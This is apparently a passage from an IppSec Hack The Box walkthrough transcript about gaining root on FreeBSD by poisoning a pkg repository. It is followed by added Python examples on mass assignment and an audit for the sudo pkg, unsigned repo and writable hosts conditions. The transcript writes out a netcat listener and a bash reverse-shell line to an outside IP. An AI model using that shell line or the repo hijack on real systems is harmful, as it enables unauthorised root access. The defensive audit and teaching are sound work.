I'm guessing my repo command did that. What, let's see, FreeBSD contains package with wrong, well, that's annoying. I wonder if I just downloaded the wrong tar, enter, xf, remove that, see, that's FreeBSD, that's FreeBSD, yet it tells me the architecture's Linux, and Linux isn't anywhere in this tar. Yeah, the manifest is BSD and the compact manifest is BSD as well. Let's see, sudo pkg update, it's taking a while, so 10.10.14.8, update this, oh, you know that moment you realize what you did wrong? scp, it's /tmp/package, I created a directory package, right, yeah, so in /tmp this is my old package, so I just downloaded the old thing again. There we go, I think sanity is restored, so that should be fine. Make sure the hosts file is correct, so sudo pkg update, see, where am I, move this into packages, okay, okay, so it got the packages and we don't have any complaints, so let's nc -lvnp 9001 and see if we can install x. Proceed with installation? Yes. /tmp/shell.sh not found, so let's create that file, so #!/bin/bash then bash -i /dev/tcp/10.10.14.8/9001 0>&1. chmod +x shell.sh, pkg install, yes, and we get a root shell. So that is doing it the intended way with pkg update and pkg install. But I hope you guys enjoyed that, take care and I'll see you all next week.
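The mass-assignment pattern described earlier (a registration handler that stores every submitted field, so a stray group=admin parameter overrides the server's default) is easiest to see as two versions of the same handler. This is an added illustration written for this page, not Moodle code and not from the video; the field names and the student/admin group values are assumptions.

```python
"""Mass assignment on a registration form: the flawed loop-over-everything
handler next to an allowlist version. Added example; field names and the
student/admin groups are assumed, not taken from Moodle."""

# The only fields a self-service registration is allowed to set.
ALLOWED_REGISTRATION_FIELDS = {"username", "password", "email"}


def _new_user_record():
    # Server-side defaults: the group is decided by the server, never by the client.
    return {"username": None, "password": None, "email": None, "group": "student"}


def register_vulnerable(form):
    """Copies every submitted key into the record, so an unexpected `group`
    (or `role`, `is_admin`, ...) parameter silently replaces the default."""
    user = _new_user_record()
    for key, value in form.items():
        user[key] = value  # anything the client sent is trusted
    return user


def register_safe(form):
    """Copies only allowlisted keys; everything else is ignored."""
    user = _new_user_record()
    for key in ALLOWED_REGISTRATION_FIELDS:
        if key in form:
            user[key] = form[key]
    return user


def unexpected_fields(form):
    """Names of submitted fields outside the allowlist. Worth logging server-side:
    a client sending `group` on a registration form is probing for exactly this bug."""
    return sorted(set(form) - ALLOWED_REGISTRATION_FIELDS)


if __name__ == "__main__":
    # Constructed request body: a normal signup with one extra parameter.
    submitted = {"username": "eve", "password": "hunter2", "group": "admin"}
    print(register_vulnerable(submitted)["group"])  # admin
    print(register_safe(submitted)["group"])        # student
    print(unexpected_fields(submitted))             # ['group']
```

The fix is the allowlist in register_safe, not a denylist of known-dangerous names; any field the server did not ask for is dropped, and the dropped names are worth logging because they are a strong signal of someone testing for mass assignment.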
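The root path in the second half of the video rests on three conditions together: sudo rights on pkg update and pkg install, a package repository that is not signature-checked, and an /etc/hosts writable by a group the user is in, so the repository hostname can be pointed elsewhere. The audit below, an added example written for this page and not a tool from the video or from FreeBSD, checks for that combination. All inputs are constructed samples (the sudoers lines, the FreeBSD.conf block using the devops.htb name the video mentions, and the /etc/hosts mode and group); the regexes handle only the flat file shapes shown here.

```python
"""Audit for the FreeBSD privilege-escalation conditions from the walkthrough:
sudo on `pkg update`/`pkg install`, a repo with signature_type none, and a
group-writable /etc/hosts. Added example; every input is a constructed sample."""
import re
from dataclasses import dataclass, field

# Constructed sudoers fragment modelled on what `sudo -l` showed for jamie.
SUDOERS_SAMPLE = """\
Defaults env_reset
root  ALL=(ALL) ALL
jamie ALL=(ALL) /usr/sbin/pkg update, /usr/sbin/pkg install *
"""

# Constructed /etc/pkg/FreeBSD.conf (UCL). With signature_type none, the
# packagesite.txz served by the repo host is trusted without verification.
REPO_CONF_WEAK = """\
FreeBSD: {
  url: "pkg+http://devops.htb/${ABI}/latest",
  mirror_type: "srv",
  signature_type: "none",
  enabled: yes
}
"""

# Same repo with signature checking turned on (the setting to aim for).
REPO_CONF_HARDENED = REPO_CONF_WEAK.replace(
    'signature_type: "none"',
    'signature_type: "fingerprints",\n  fingerprints: "/usr/share/keys/pkg"')


@dataclass
class SudoRule:
    who: str                    # user name or %group
    nopasswd: bool
    commands: list = field(default_factory=list)


def parse_sudoers(text):
    """Reads `who HOST=(RUNAS) [NOPASSWD:] cmd, cmd` lines; skips Defaults and comments."""
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith("Defaults"):
            continue
        m = re.match(r"^(\S+)\s+\S+=\([^)]*\)\s*(NOPASSWD:\s*)?(.+)$", line)
        if m:
            cmds = [c.strip() for c in m.group(3).split(",")]
            rules.append(SudoRule(m.group(1), bool(m.group(2)), cmds))
    return rules


PKG_BIN = re.compile(r"^(?:/usr/(?:local/)?sbin/)?pkg$")


def pkg_subcommands(rule):
    """Set of pkg subcommands ('install', 'update', ...) a rule permits."""
    subs = set()
    for cmd in rule.commands:
        parts = cmd.split()
        if len(parts) > 1 and PKG_BIN.match(parts[0]):
            subs.add(parts[1])
    return subs


def parse_repo_conf(text):
    """Flat key: value reader for a single-repo pkg .conf block (assumed shape)."""
    conf = {}
    for line in text.splitlines():
        m = re.match(r'\s*([A-Za-z_]+)\s*:\s*"?([^",]*)"?\s*,?\s*$', line)
        if m and m.group(2).strip() != "{":
            conf[m.group(1)] = m.group(2).strip()
    return conf


def hosts_redirectable(hosts_mode, hosts_group, user_groups):
    """True when /etc/hosts is group-writable by a group the user belongs to."""
    return bool(hosts_mode & 0o020) and hosts_group in user_groups


def assess(user, user_groups, sudoers_text, repo_text, hosts_mode, hosts_group):
    """Findings for one user: each string names a condition a defender should remove."""
    findings = []
    unsigned = parse_repo_conf(repo_text).get("signature_type", "none") == "none"
    for rule in parse_sudoers(sudoers_text):
        if rule.who != user and not (rule.who.startswith("%") and rule.who[1:] in user_groups):
            continue
        subs = pkg_subcommands(rule)
        if "install" in subs:
            findings.append("sudo pkg install: a package's install scripts run as root")
        if "update" in subs and unsigned:
            findings.append("sudo pkg update with signature_type none: repo metadata unverified")
        if "update" in subs and hosts_redirectable(hosts_mode, hosts_group, user_groups):
            findings.append("/etc/hosts writable by user's group: repo host can be repointed")
    return findings


def demo():
    """Constructed scenario: jamie in wheel, /etc/hosts 0664 root:wheel."""
    weak = assess("jamie", {"jamie", "wheel"}, SUDOERS_SAMPLE, REPO_CONF_WEAK, 0o664, "wheel")
    hardened = assess("jamie", {"jamie", "wheel"}, SUDOERS_SAMPLE, REPO_CONF_HARDENED, 0o644, "wheel")
    return weak, hardened


if __name__ == "__main__":
    for label, result in zip(("weak", "hardened"), demo()):
        print(label, result)
```

In the hardened run only the sudo pkg install finding remains: signing the repository and fixing the /etc/hosts mode close the update path, but sudo on pkg install still lets the user install a locally supplied archive, so that rule has to go as well.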
Info
Channel: IppSec
Views: 10,302
Rating: 4.9237056 out of 5
Id: bUfZlBMFJ2I
Length: 75min 55sec (4555 seconds)
Published: Sat Sep 11 2021